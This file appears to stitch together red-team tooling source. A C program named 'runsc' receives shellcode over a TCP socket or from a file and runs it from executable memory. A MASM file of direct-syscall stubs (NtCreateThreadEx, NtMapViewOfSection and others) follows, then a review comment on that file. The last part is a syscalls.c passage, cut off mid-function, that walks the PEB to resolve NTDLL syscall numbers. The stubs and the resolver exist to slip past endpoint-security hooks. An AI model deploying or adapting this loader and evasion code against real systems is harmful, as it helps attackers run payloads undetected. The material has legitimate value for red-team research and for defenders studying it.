23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279
280 // execute
281 ((void(*)())bin)();
282
283 printf("OK!\n");
284
285 if (p->sim) {
286 #ifndef WIN
287 // close all descriptors
288 for (i=0; i<p->sim && p->sim<2048; i++) {
289 close(fd[i]);
290 }
291 #else
292 // todo
293 #endif
294 }
295 #ifdef WIN
296 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
297 #else
298 munmap (bin, p->code_len);
299 #endif
300 }
301 }
302
303 void send_data(args_t *p, int s) {
304 FILE *fd;
305 int outlen, len, opt;
306 uint32_t sum;
307 uint8_t buf[BUFSIZ];
308
309 // open file for read in binary mode
310 printf ("[ opening %s for read\n", p->file);
311 fd = fopen(p->file, "rb");
312
313 if (fd != NULL)
314 {
315 // send contents of file
316 printf ("[ sending data\n");
317 for (;;) {
318 // read block
319 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
320 // zero or less indicates EOF
321 if (outlen <= 0) break;
322 // send contents
323 for (sum=0; sum<outlen; sum += len) {
324 len=send (s, &buf[sum], outlen - sum, 0);
325 if (len <= 0) break;
326 }
327 p->code_len += sum;
328 if (outlen != sum) break;
329 }
330 printf ("[ sent %i bytes\n", p->code_len);
331 fclose(fd);
332 }
333 }
334
335 void recv_data(args_t *p, int s) {
336 int opt, r;
337 fd_set fds;
338 struct timeval tv;
339 void *pv;
340
341 p->code_len = 0;
342 p->code = malloc(BUFSIZ);
343
344 // set to non-blocking mode
345 #ifdef WIN
346 opt=1;
347 ioctlsocket (s, FIONBIO, (u_long*)&opt);
348 #else
349 opt=fcntl(s, F_GETFL, 0);
350 fcntl(s, F_SETFL, opt | O_NONBLOCK);
351 #endif
352 // keep reading until remote disconnects or we run out of memory
353 printf ("[ receiving data\n");
354
355 for (;;) {
356 FD_ZERO(&fds);
357 FD_SET(s, &fds);
358
359 tv.tv_sec = 5;
360 tv.tv_usec = 0;
361 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
362
363 if (r <= 0) {
364 printf ("[ waiting for data timed out or failed\n");
365 break;
366 }
367 // receive a block
368 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
369 if (r <= 0) break;
370 p->code_len += r;
371 // resize buffer
372 pv = realloc(p->code, p->code_len + BUFSIZ);
373 // on error, free pointer
374 if(pv == NULL) {
375 p->code_len = 0;
376 free(p->code);
377 p->code = NULL;
378 printf("[ error: out of memory.\n");
379 break;
380 }
381 p->code = pv;
382 }
383 if(p->code_len != 0) {
384 printf ("[ received %i bytes\n", p->code_len);
385 }
386 }
387
388 //
389 int ssr (args_t *p)
390 /**
391 * PURPOSE : send a shellcode or receive one from remote system and execute it
392 *
393 * RETURN : 0 or length of shellcode sent/received
394 *
395 * NOTES : None
396 *
397 *F*/
398 {
399 int s, opt, r, t;
400 fd_set fds;
401 struct timeval tv;
402
403 p->code_len=0;
404
405 // create socket
406 printf ("[ creating socket\n");
407 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
408 if (s < 0) return 0;
409
410 // ensure we can reuse socket
411 t=1;
412 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
413
414 // bind to port
415 printf ("[ binding to port %s\n", p->port);
416 r = bind(s, p->ai_addr, p->ai_addrlen);
417 if (r == 0) {
418 // listen
419 r = listen (s, 1);
420 if (r == 0) {
421 printf ("[ waiting for connections on %s\n", addr2ip(p));
422 if (r == 0) {
423 t = accept(s, p->ai_addr, &p->ai_addrlen);
424 printf ("[ accepting connection from %s\n", addr2ip(p));
425 if (t > 0) {
426 if (p->tx_mode == RSC_SEND) {
427 send_data(p, t);
428 } else {
429 recv_data(p, t);
430 xcode(p);
431 }
432 }
433 }
434 // close socket to peer
435 shutdown(t, SHUT_RDWR);
436 close(t);
437 } else {
438 perror("listen");
439 }
440 } else {
441 perror("bind");
442 }
443 // close listening socket
444 shutdown(s, SHUT_RDWR);
445 close(s);
446
447 return p->code_len;
448 }
449
450 /**F*****************************************************************/
451 int csr (args_t *p)
452 /**
453 * PURPOSE : opens connection to remote system and sends shellcode
454 *
455 * RETURN : 0 or 1
456 *
457 * NOTES : None
458 *
459 *F*/
460 {
461 int s, r, opt;
462 fd_set fds;
463 struct timeval tv;
464
465 printf ("[ creating socket\n");
466 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
467 if (s < 0) return 0;
468
469 // try connect to remote
470 printf ("[ connecting to %s\n", addr2ip(p));
471 r = connect(s, p->ai_addr, p->ai_addrlen);
472
473 if (r == 0) {
474 if (p->tx_mode==RSC_SEND) {
475 send_data(p, s);
476 } else {
477 recv_data(p, s);
478 xcode(p);
479 }
480 } else {
481 xstrerror("connect");
482 }
483 printf ("[ closing connection\n");
484 shutdown(s, SHUT_RDWR);
485 close(s);
486 return 1;
487 }
488
489 /**F*****************************************************************/
490 void xfile(args_t *p)
491 /**
492 * PURPOSE : read contents of shellcode and attempt to execute it locally
493 *
494 * RETURN : Nothing
495 *
496 * NOTES : None
497 *
498 *F*/
499 {
500 FILE *fd;
501 int len;
502 void *pv;
503
504 p->code_len = 0;
505 p->code = NULL;
506
507 printf ("[ reading code from %s\n", p->file);
508 fd = fopen(p->file, "rb");
509
510 if (fd == NULL) {
511 xstrerror("fopen(\"%s\")", p->file);
512 return;
513 }
514 // read contents of file
515 for (;;) {
516 // first loop? allocate block
517 if(p->code == NULL) {
518 p->code = malloc(BUFSIZ);
519 }
520 // read a block of data
521 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
522 if (len <= 0) break;
523 p->code_len += len;
524 // resize buffer for next read
525 pv = realloc(p->code, p->code_len + BUFSIZ);
526
527 if(pv == NULL) {
528 p->code_len = 0;
529 free(p->code);
530 p->code = NULL;
531 printf("[ error: out of memory!.\n");
532 break;
533 }
534 p->code = pv;
535 }
536 fclose(fd);
537
538 if(p->code_len != 0) {
539 xcode(p);
540 }
541 }
542
543 #ifdef WIN
544 void load_modules(char *names) {
545 HMODULE mod;
546 char *p = strtok(names, ";,");
547
548 while (p != NULL) {
549 printf ("[ loading %s...", p);
550 mod = LoadLibrary(p);
551
552 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
553
554 p = strtok(NULL, ";,");
555 }
556 }
557 #endif
558
559 /**F*****************************************************************/
560 void usage (void) {
561 printf ("\n usage: runsc <address> [options]\n");
562 printf ("\n -4 Use IP version 4 (default)");
563 printf ("\n -6 Use IP version 6");
564 printf ("\n -l Listen mode (required when listening on specific interface)");
565 #ifdef WIN
566 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
567 #endif
568 printf ("\n -f <file> Read PIC from <file>");
569 printf ("\n -s <count> Simulate real process by creating file descriptors");
570 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
571 printf ("\n -x Execute PIC (requires -f)");
572 printf ("\n\n Press any key to continue . . .");
573 getchar ();
574
575 exit (0);
576 }
577
578 /**F*****************************************************************/
579 char* getparam (int argc, char *argv[], int *i) {
580 int n=*i;
581 if (argv[n][2] != 0) {
582 return &argv[n][2];
583 }
584 if ((n+1) < argc) {
585 *i=n+1;
586 return argv[n+1];
587 }
588 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
589 exit (0);
590 }
591
592 void parse_args (args_t *p, int argc, char *argv[]) {
593 int i;
594 char opt;
595
596 // for each argument
597 for (i=1; i<argc; i++)
598 {
599 // is this option?
600 if (argv[i][0]=='-' || argv[i][1]=='/')
601 {
602 // get option value
603 opt=argv[i][1];
604 switch (opt)
605 {
606 case '4':
607 p->ai_family=AF_INET;
608 break;
609 case '6': // use ipv6 (default is ipv4)
610 p->ai_family=AF_INET6;
611 break;
612 case 'x': // execute PIC, requires -f
613 p->mode=RSC_EXEC;
614 break;
615 case 'd': // debug the code
616 p->dbg=1;
617 break;
618 case 'f': // file
619 p->file=getparam(argc, argv, &i);
620 break;
621 case 'l': // listen for incoming connections
622 p->mode=RSC_SERVER;
623 break;
624 #ifdef WIN
625 case 'm': // windows only, loads modules required by shellcode
626 p->modules = getparam(argc, argv, &i);
627 break;
628 #endif
629 case 's': // create file descriptors before execution
630 p->sim=atoi(getparam(argc, argv, &i));
631 break;
632 case 'p': // port number
633 p->port=getparam(argc, argv, &i);
634 p->port_nbr=atoi(p->port);
635 break;
636 case '?': // display usage
637 case 'h':
638 usage ();
639 break;
640 default:
641 printf ("[ unknown option %c\n", opt);
642 usage();
643 break;
644 }
645 } else {
646 // assume it's hostname or ip
647 p->address=argv[i];
648 p->mode=RSC_CLIENT;
649 }
650 }
651 }
652
653 int main (int argc, char *argv[]) {
654 args_t args;
655 struct stat st;
656
657 #ifdef WIN
658 //
659 PVOID OldValue=NULL;
660 WSADATA wsa;
661
662 //Wow64DisableWow64FsRedirection (&OldValue);
663 LoadLibrary("ws2_32");
664 LoadLibrary("advapi32");
665
666 WSAStartup(MAKEWORD(2,0), &wsa);
667 #endif
668
669 setbuf(stdout, NULL);
670 setbuf(stderr, NULL);
671
672 memset (&args, 0, sizeof(args));
673
674 // set default parameters
675 args.address = NULL;
676 args.file = NULL;
677 args.ai_family = AF_INET;
678 args.port = DEFAULT_PORT;
679 args.port_nbr = atoi(args.port);
680 args.mode = -1;
681 args.tx_mode = -1;
682 args.sim = 0;
683 args.dbg = 0;
684
685 printf ("\n[ run shellcode v0.2\n");
686
687 parse_args(&args, argc, argv);
688
689 // check if we have file parameter and it accessible
690 if (args.file!=NULL) {
691 if (stat (args.file, &st)) {
692 printf ("[ unable to access %s\n", args.file);
693 return 0;
694 }
695 }
696
697 #ifdef WIN
698 if (args.modules != NULL) {
699 load_modules(args.modules);
700 }
701 #endif
702 // if mode is executing
703 if (args.mode == RSC_EXEC) {
704 if (args.file != NULL) {
705 xfile(&args);
706 return 0;
707 } else {
708 printf ("\n[ you've used -x without supplying file with -f");
709 return 0;
710 }
711 }
712 if (init_network(&args)) {
713 // if no file specified, we receive and execute data
714 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
715
716 // if mode is -1, we listen for incoming connections
717 if (args.mode == -1) {
718 args.mode=RSC_SERVER;
719 }
720
721 // if no file specified, set to receive one
722 if (args.tx_mode == -1) {
723 args.tx_mode = RSC_RECV;
724 }
725
726 if (args.mode == RSC_SERVER) {
727 ssr (&args);
728 } else {
729 csr (&args);
730 }
731 }
732 if(args.code_len != 0) {
733 free(args.code);
734 }
735 return 0;
736 }
0 .code
1
2 EXTERN SW2_GetSyscallNumber: PROC
3
4 NtCreateSection PROC
5 push rcx
6 push rdx
7 push r8
8 push r9
9 mov ecx, 032956E27h
10 mov rdx, qword ptr [rsp + 060h]
11 sub rsp, 028h
12 call SW2_GetSyscallNumber
13 add rsp, 028h
14 pop r9
15 pop r8
16 pop rdx
17 pop rcx
18 mov r10, rcx
19 syscall
20 ret
21 NtCreateSection ENDP
22
23 NtMapViewOfSection PROC
24 push rcx
25 push rdx
26 push r8
27 push r9
28 mov ecx, 0035E220Dh
29 mov rdx, qword ptr [rsp + 078h]
30 sub rsp, 028h
31 call SW2_GetSyscallNumber
32 add rsp, 028h
33 pop r9
34 pop r8
35 pop rdx
36 pop rcx
37 mov r10, rcx
38 syscall
39 ret
40 NtMapViewOfSection ENDP
41
42 NtUnmapViewOfSection PROC
43 push rcx
44 push rdx
45 push r8
46 push r9
47 mov ecx, 09ACEB842h
48 mov rdx, r8
49 sub rsp, 028h
50 call SW2_GetSyscallNumber
51 add rsp, 028h
52 pop r9
53 pop r8
54 pop rdx
55 pop rcx
56 mov r10, rcx
57 syscall
58 ret
59 NtUnmapViewOfSection ENDP
60
61 NtContinue PROC
62 push rcx
63 push rdx
64 push r8
65 push r9
66 mov ecx, 0F2989153h
67 mov rdx, r8
68 sub rsp, 028h
69 call SW2_GetSyscallNumber
70 add rsp, 028h
71 pop r9
72 pop r8
73 pop rdx
74 pop rcx
75 mov r10, rcx
76 syscall
77 ret
78 NtContinue ENDP
79
80 NtClose PROC
81 push rcx
82 push rdx
83 push r8
84 push r9
85 mov ecx, 0349DD6D1h
86 mov rdx, rdx
87 sub rsp, 028h
88 call SW2_GetSyscallNumber
89 add rsp, 028h
90 pop r9
91 pop r8
92 pop rdx
93 pop rcx
94 mov r10, rcx
95 syscall
96 ret
97 NtClose ENDP
98
99 NtWaitForSingleObject PROC
100 push rcx
101 push rdx
102 push r8
103 push r9
104 mov ecx, 0E3BDE123h
105 mov rdx, r9
106 sub rsp, 028h
107 call SW2_GetSyscallNumber
108 add rsp, 028h
109 pop r9
110 pop r8
111 pop rdx
112 pop rcx
113 mov r10, rcx
114 syscall
115 ret
116 NtWaitForSingleObject ENDP
117
118 NtProtectVirtualMemory PROC
119 push rcx
120 push rdx
121 push r8
122 push r9
123 mov ecx, 00B911517h
124 mov rdx, qword ptr [rsp + 050h]
125 sub rsp, 028h
126 call SW2_GetSyscallNumber
127 add rsp, 028h
128 pop r9
129 pop r8
130 pop rdx
131 pop rcx
132 mov r10, rcx
133 syscall
134 ret
135 NtProtectVirtualMemory ENDP
136
137 NtGetContextThread PROC
138 push rcx
139 push rdx
140 push r8
141 push r9
142 mov ecx, 01CB74215h
143 mov rdx, r8
144 sub rsp, 028h
145 call SW2_GetSyscallNumber
146 add rsp, 028h
147 pop r9
148 pop r8
149 pop rdx
150 pop rcx
151 mov r10, rcx
152 syscall
153 ret
154 NtGetContextThread ENDP
155
156 NtAllocateVirtualMemory PROC
157 push rcx
158 push rdx
159 push r8
160 push r9
161 mov ecx, 031A5474Bh
162 mov rdx, qword ptr [rsp + 058h]
163 sub rsp, 028h
164 call SW2_GetSyscallNumber
165 add rsp, 028h
166 pop r9
167 pop r8
168 pop rdx
169 pop rcx
170 mov r10, rcx
171 syscall
172 ret
173 NtAllocateVirtualMemory ENDP
174
175 NtFreeVirtualMemory PROC
176 push rcx
177 push rdx
178 push r8
179 push r9
180 mov ecx, 087907FEFh
181 mov rdx, qword ptr [rsp + 048h]
182 sub rsp, 028h
183 call SW2_GetSyscallNumber
184 add rsp, 028h
185 pop r9
186 pop r8
187 pop rdx
188 pop rcx
189 mov r10, rcx
190 syscall
191 ret
192 NtFreeVirtualMemory ENDP
193
194 NtCreateFile PROC
195 push rcx
196 push rdx
197 push r8
198 push r9
199 mov ecx, 0249DFE2Ah
200 mov rdx, qword ptr [rsp + 080h]
201 sub rsp, 028h
202 call SW2_GetSyscallNumber
203 add rsp, 028h
204 pop r9
205 pop r8
206 pop rdx
207 pop rcx
208 mov r10, rcx
209 syscall
210 ret
211 NtCreateFile ENDP
212
213 NtQueryVirtualMemory PROC
214 push rcx
215 push rdx
216 push r8
217 push r9
218 mov ecx, 055CF2B39h
219 mov rdx, qword ptr [rsp + 058h]
220 sub rsp, 028h
221 call SW2_GetSyscallNumber
222 add rsp, 028h
223 pop r9
224 pop r8
225 pop rdx
226 pop rcx
227 mov r10, rcx
228 syscall
229 ret
230 NtQueryVirtualMemory ENDP
231
232 NtCreateThreadEx PROC
233 push rcx
234 push rdx
235 push r8
236 push r9
237 mov ecx, 034297693h
238 mov rdx, qword ptr [rsp + 080h]
239 sub rsp, 028h
240 call SW2_GetSyscallNumber
241 add rsp, 028h
242 pop r9
243 pop r8
244 pop rdx
245 pop rcx
246 mov r10, rcx
247 syscall
248 ret
249 NtCreateThreadEx ENDP
250
251 NtFlushInstructionCache PROC
252 push rcx
253 push rdx
254 push r8
255 push r9
256 mov ecx, 0FFACC9F7h
257 mov rdx, r9
258 sub rsp, 028h
259 call SW2_GetSyscallNumber
260 add rsp, 028h
261 pop r9
262 pop r8
263 pop rdx
264 pop rcx
265 mov r10, rcx
266 syscall
267 ret
268 NtFlushInstructionCache ENDP
269
270 end
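Review bot: None of the fourteen stubs in this MASM file documents where the `rdx` load offset comes from or what `eax` holds when `syscall` executes, although the GCC inline-asm copies of the same stubs in syscalls.c carry the offset formula. I would add `; rdx = SyscallList (last argument): (4+5+(NUM_PARAMS-4-1))*8` beside each `mov rdx, qword ptr [rsp + ...]`. Above each `syscall` I would add `; eax = index from SW2_GetSyscallNumber, or -1 on lookup failure (not checked here)`, because SW2_GetSyscallNumber as shown on this page returns -1 for a NULL list or an unmatched hash and the stubs never test for it. A short header comment should also say that the hash constants duplicate the ones in syscalls.c and presumably depend on SW2_SEED, so the two files have to be regenerated together.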
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "syscalls.h"
32
33 // Code below is adapted from @modexpblog. Read linked article for more details.
34 // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
35
36 DWORD SW2_HashSyscall(PCSTR FunctionName)
37 {
38 DWORD i = 0;
39 DWORD Hash = SW2_SEED;
40
41 while (FunctionName[i])
42 {
43 WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);
44 Hash ^= PartialName + SW2_ROR8(Hash);
45 }
46
47 return Hash;
48 }
49
50 BOOL SW2_PopulateSyscallList(PSYSCALL_LIST SyscallList)
51 {
52 // Return early if the list is already populated.
53 if (SyscallList->Count) return TRUE;
54
55 PSW2_PEB Peb = (PSW2_PEB)READ_MEMLOC(PEB_OFFSET);
56 PSW2_PEB_LDR_DATA Ldr = Peb->Ldr;
57 PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
58 PVOID DllBase = NULL;
59
60 // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
61 // in the list, so it's safer to loop through the full list and find it.
62 PSW2_LDR_DATA_TABLE_ENTRY LdrEntry;
63 for (LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
64 {
65 DllBase = LdrEntry->DllBase;
66 PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
67 PIMAGE_NT_HEADERS NtHeaders = SW2_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
68 PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
69 DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
70 if (VirtualAddress == 0) continue;
71
72 ExportDirectory = SW2_RVA2VA(PIMAGE_EXPORT_DIRECTORY, DllBase, VirtualAddress);
73
74 // If this is NTDLL.dll, exit loop.
75 PCHAR DllName = SW2_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
76 if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
77 if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;
78 }
79
80 if (!ExportDirectory) return FALSE;
81
82 DWORD NumberOfNames = ExportDirectory->NumberOfNames;
83 PDWORD Functions = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
84 PDWORD Names = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
85 PWORD Ordinals = SW2_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
86
87 // Populate SyscallList with unsorted Zw* entries.
88 DWORD i = 0;
89 PSW2_SYSCALL_ENTRY Entries = SyscallList->Entries;
90 do
91 {
92 PCHAR FunctionName = SW2_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
93
94 // Is this a system call?
95 if (*(USHORT*)FunctionName == 0x775a)
96 {
97 Entries[i].Hash = SW2_HashSyscall(FunctionName);
98 Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
99
100 i++;
101 if (i == SW2_MAX_ENTRIES) break;
102 }
103 } while (--NumberOfNames);
104
105 // Save total number of system calls found.
106 SyscallList->Count = i;
107
108 // Sort the list by address in ascending order.
109 for (DWORD i = 0; i < SyscallList->Count - 1; i++)
110 {
111 for (DWORD j = 0; j < SyscallList->Count - i - 1; j++)
112 {
113 if (Entries[j].Address > Entries[j + 1].Address)
114 {
115 // Swap entries.
116 SW2_SYSCALL_ENTRY TempEntry;
117
118 TempEntry.Hash = Entries[j].Hash;
119 TempEntry.Address = Entries[j].Address;
120
121 Entries[j].Hash = Entries[j + 1].Hash;
122 Entries[j].Address = Entries[j + 1].Address;
123
124 Entries[j + 1].Hash = TempEntry.Hash;
125 Entries[j + 1].Address = TempEntry.Address;
126 }
127 }
128 }
129
130 return TRUE;
131 }
132
133 EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash, PSYSCALL_LIST SyscallList)
134 {
135 // Check that the SyscallList was allocated
136 if (SyscallList == NULL) return -1;
137 // Ensure SyscallList is populated.
138 if (!SW2_PopulateSyscallList(SyscallList)) return -1;
139
140 for (DWORD i = 0; i < SyscallList->Count; i++)
141 {
142 if (FunctionHash == SyscallList->Entries[i].Hash)
143 {
144 return i;
145 }
146 }
147
148 return -1;
149 }
150
151 #if defined(_MSC_VER) && defined (_M_IX86)
152
153 __declspec(naked) NTSTATUS NtCreateSection(
154 OUT PHANDLE SectionHandle,
155 IN ACCESS_MASK DesiredAccess,
156 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
157 IN PLARGE_INTEGER MaximumSize OPTIONAL,
